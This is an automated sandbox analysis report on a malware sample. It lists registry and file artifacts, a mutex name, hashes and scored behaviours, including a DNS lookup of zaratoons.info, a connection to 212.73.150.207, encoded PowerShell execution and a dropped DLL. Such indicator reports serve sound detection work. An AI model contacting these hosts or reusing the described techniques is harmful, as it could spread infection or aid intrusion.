SYSTEM\CurrentControlSet\Services\.net clr networking\Performance
HKEY_LOCAL_MACHINE
CategoryOptions
CategoryOptions
FileMappingSize
FileMappingSize
Counter Names
WinRegistryKey
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE
DNSRecord
zaratoons.info
File
conout$
File
STD_INPUT_HANDLE
Mutex
Global\.net clr networking
Mutex
Global\.net clr networking
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE
InstallationType
InstallationType
WinRegistryKey
SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance
HKEY_LOCAL_MACHINE
Library
Library
IsMultiInstance
IsMultiInstance
First Counter
First Counter
Library
Library
IsMultiInstance
IsMultiInstance
First Counter
First Counter
WinRegistryKey
SYSTEM\CurrentControlSet\Services\.net clr networking\Performance
HKEY_LOCAL_MACHINE
CategoryOptions
CategoryOptions
FileMappingSize
FileMappingSize
Counter Names
CategoryOptions
CategoryOptions
FileMappingSize
FileMappingSize
Counter Names
WinRegistryKey
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE
DNSRecord
zaratoons.info
File
conout$
File
STD_INPUT_HANDLE
WinRegistryKey
Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE
InstallationType
InstallationType
DNSRecord
zaratoons.info
File
conout$
File
STD_INPUT_HANDLE
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
path
path
File
conout$
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
File
conout$
File
users\5p5nrgjn0js halpmcxz\appdata\local\temp\vthqexnegi.dll
users\5p5nrgjn0js halpmcxz\appdata\local\temp\vthqexnegi.dll
c:\
c:\users\5p5nrgjn0js halpmcxz\appdata\local\temp\vthqexnegi.dll
dll
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
DNSRecord
zaratoons.info
File
conout$
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
File
conout$
File
STD_INPUT_HANDLE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
path
path
path
path
File
conout$
File
STD_INPUT_HANDLE
WinRegistryKey
Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
File
conout$
File
STD_INPUT_HANDLE
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
File
conout$
File
STD_INPUT_HANDLE
Mutex
Global\.net clr networking
DNSRecord
zaratoons.info
File
conout$
File
conout$
File
STD_INPUT_HANDLE
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
File
conout$
File
STD_INPUT_HANDLE
Mutex
Global\.net clr networking
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE
InstallationType
InstallationType
WinRegistryKey
SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance
HKEY_LOCAL_MACHINE
Library
Library
IsMultiInstance
IsMultiInstance
First Counter
First Counter
WinRegistryKey
SYSTEM\CurrentControlSet\Services\.net clr networking\Performance
HKEY_LOCAL_MACHINE
CategoryOptions
CategoryOptions
FileMappingSize
FileMappingSize
Counter Names
WinRegistryKey
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE
DNSRecord
zaratoons.info
File
conout$
File
STD_INPUT_HANDLE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
PSMODULEPATH
File
conout$
WinRegistryKey
Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE
File
conout$
File
STD_INPUT_HANDLE
WinRegistryKey
Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
File
conout$
File
STD_INPUT_HANDLE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
File
conout$
File
STD_INPUT_HANDLE
File
conout$
File
STD_INPUT_HANDLE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
File
conout$
File
conout$
File
conout$
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
File
conout$
File
conout$
WinRegistryKey
Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
File
conout$
File
conout$
File
STD_INPUT_HANDLE
File
conout$
File
STD_INPUT_HANDLE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
File
conout$
File
STD_INPUT_HANDLE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
PSMODULEPATH
File
conout$
File
conout$
File
windows\microsoft.net\framework64\v2.0.50727\config\machine.config
windows\microsoft.net\framework64\v2.0.50727\config\machine.config
c:\
c:\windows\microsoft.net\framework64\v2.0.50727\config\machine.config
config
File
users\5p5nrgjn0js halpmcxz\appdata\local\temp\vthqexnegi.dll
users\5p5nrgjn0js halpmcxz\appdata\local\temp\vthqexnegi.dll
c:\
c:\users\5p5nrgjn0js halpmcxz\appdata\local\temp\vthqexnegi.dll
dll
File
STD_INPUT_HANDLE
Mutex
Global\.net clr networking
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE
InstallationType
InstallationType
InstallationType
InstallationType
WinRegistryKey
SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance
HKEY_LOCAL_MACHINE
Library
Library
IsMultiInstance
IsMultiInstance
First Counter
First Counter
Library
Library
IsMultiInstance
IsMultiInstance
First Counter
First Counter
WinRegistryKey
SYSTEM\CurrentControlSet\Services\.net clr networking\Performance
HKEY_LOCAL_MACHINE
CategoryOptions
CategoryOptions
FileMappingSize
FileMappingSize
Counter Names
CategoryOptions
CategoryOptions
FileMappingSize
FileMappingSize
Counter Names
WinRegistryKey
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE
DNSRecord
zaratoons.info
File
conout$
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
File
conout$
File
conout$
File
STD_INPUT_HANDLE
Mutex
Global\.net clr networking
WinRegistryKey
Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE
InstallationType
InstallationType
WinRegistryKey
SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance
HKEY_LOCAL_MACHINE
Library
Library
IsMultiInstance
IsMultiInstance
First Counter
First Counter
WinRegistryKey
SYSTEM\CurrentControlSet\Services\.net clr networking\Performance
HKEY_LOCAL_MACHINE
CategoryOptions
CategoryOptions
FileMappingSize
FileMappingSize
Counter Names
WinRegistryKey
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE
DNSRecord
zaratoons.info
File
conout$
File
conout$
File
conout$
File
conout$
File
STD_INPUT_HANDLE
Mutex
Global\.net clr networking
Mutex
Global\.net clr networking
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE
InstallationType
InstallationType
WinRegistryKey
SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance
HKEY_LOCAL_MACHINE
Library
Library
IsMultiInstance
IsMultiInstance
First Counter
First Counter
WinRegistryKey
SYSTEM\CurrentControlSet\Services\.net clr networking\Performance
HKEY_LOCAL_MACHINE
CategoryOptions
CategoryOptions
FileMappingSize
FileMappingSize
Counter Names
WinRegistryKey
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE
DNSRecord
zaratoons.info
File
conout$
WinRegistryKey
Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
File
conout$
File
conout$
File
STD_INPUT_HANDLE
Mutex
Global\.net clr networking
DNSRecord
zaratoons.info
File
conout$
File
STD_INPUT_HANDLE
File
conout$
Analyzed Sample #632978
Malware Artifacts
632978
Sample-ID: #632978
Job-ID: #872934
This sample was analyzed by VMRay Analyzer 3.0.1 on a Windows 7 system
92
VTI Score based on VTI Database Version 3.3
Metadata of Sample File #632978
Submission-ID: #1030294
04ad737a63367cfb492597ba86fd3509eb7340f2b762d830c05dfd9fe9870a07vbe
MD5
c0b9640880d94923f8aeb1b7944a4f69
SHA1
2dddc57a59b07449a052167218bc3a198c8cd82c
SHA256
04ad737a63367cfb492597ba86fd3509eb7340f2b762d830c05dfd9fe9870a07
Opened_By
Metadata of Analysis for Job-ID #872934
False
Timeout
True
989.593
XDUWTFONO
win7_64_sp1
x86 64-bit
Windows 7
6.1.7601.17514 (3844dbb9-2017-4967-be7a-a4a2c20430fa)
5p5NrGJn0jS HALPmcxz
XDUWTFONO
This is a property collection for additional information of VMRay analysis
VMRay Analyzer
Process
VTI rule match with VTI rule score 1/5
vmray_install_ipc_endpoint
Creates mutex with name "".
Creates system object
Process
VTI rule match with VTI rule score 1/5
vmray_install_ipc_endpoint
Creates mutex with name "Global\.net clr networking".
Creates system object
Process
VTI rule match with VTI rule score 4/5
vmray_create_many_processes
Above average number of processes were monitored.
Creates an unusually large number of processes
Network
VTI rule match with VTI rule score 2/5
vmray_request_dns_by_name
Resolves host name "zaratoons.info".
Performs DNS request
Network
VTI rule match with VTI rule score 3/5
vmray_read_net_adapter_addresses_by_api
Reads the network adapters' addresses by API.
Reads network adapter information
Process
VTI rule match with VTI rule score 1/5
vmray_enumerate_processes
Enumerates running processes.
Enumerates running processes
Process
VTI rule match with VTI rule score 4/5
vmray_execute_encoded_powershell_script
Executes encoded PowerShell script to possibly hide malicious payload.
Executes encoded PowerShell script
Network
VTI rule match with VTI rule score 1/5
vmray_tcp_out_connection
Outgoing TCP connection to host "212.73.150.207:443".
Connects to remote host
Network
VTI rule match with VTI rule score 2/5
vmray_establish_http_connection
URL "https://www.google.com".
Connects to HTTP server
PE
VTI rule match with VTI rule score 2/5
vmray_drop_pe_file
Drops file "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\vThQexNegi.dll".
Drops PE file